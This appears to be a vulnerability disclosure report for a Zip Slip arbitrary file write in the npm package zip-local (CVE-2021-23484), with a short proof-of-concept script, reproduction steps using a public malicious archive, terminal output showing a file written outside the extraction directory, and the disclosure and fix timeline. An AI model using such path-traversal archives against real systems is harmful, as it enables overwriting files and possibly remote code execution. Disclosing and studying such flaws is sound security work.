Relative Path Traversal in mostafa-samir/zip-local

Valid

Reported on

Oct 13th 2021


Description

zip-local is vulnerable to Arbitrary File Write via Archive Extraction (Zip Slip).

Proof of Concept

// PoC.js
var zipper = require('zip-local');
 
zipper.unzip("zipslip.zip", function(error, unzipped) {
 
    if(!error) {
        // extract to the current working directory
        unzipped.save(null, function() { });
 
        var unzippedfs = unzipped.memory();

    }
});

Execute the following commands

1. npm install zip-local # Install affected module
2. zipslip example file can be found at - https://github.com/snyk/zip-slip-vulnerability/blob/master/archives/zip-slip.zip 
3. node poc.js #  Run the PoC

Will extract "good.txt" to current directory and "evil.txt" to /tmp directory

┌──(noob㉿Hacking)-[~/node_modules/zip-local]
└─$ ls     
CHANGELOG.md  LICENSE  node_modules  poc.js     tests
libs          main.js  package.json  README.md  zipslip.zip
                                                             
┌──(noob㉿Hacking)-[~/node_modules/zip-local]
└─$ ls /tmp              
                                                             
┌──(noob㉿Hacking)-[~/node_modules/zip-local]
└─$ node poc.js     
                                                             
┌──(noob㉿Hacking)-[~/node_modules/zip-local]
└─$ ls                   
CHANGELOG.md  LICENSE       package.json  tests
good.txt      main.js       poc.js        zipslip.zip
libs          node_modules  README.md
                                                             
┌──(noob㉿Hacking)-[~/node_modules/zip-local]
└─$ ls /tmp    
evil.txt

Impact

It may lead to Information Disclosure/DoS/RCE.

We created a GitHub Issue asking the maintainers to create a SECURITY.md 7 months ago
7he6uzzer modified the report
7 months ago
We have contacted a member of the mostafa-samir/zip-local team and are waiting to hear back 5 months ago
We have sent a follow up to the mostafa-samir/zip-local team. We will try again in 7 days. 5 months ago
We have sent a second follow up to the mostafa-samir/zip-local team. We will try again in 10 days. 5 months ago
We have sent a third and final follow up to the mostafa-samir/zip-local team. This report is now considered stale. 4 months ago
Mostafa Samir validated this vulnerability 4 months ago
7he6uzzer has been awarded the disclosure bounty
The fix bounty is now up for grabs
Mostafa Samir confirmed that a fix has been merged on 9f77ea 4 months ago
Mostafa Samir has been awarded the fix bounty
7he6uzzer
4 months ago

Researcher


Got assigned with CVE-2021-23484. Thanks @Mostafa Samir and @zidingz 🎉

to join this conversation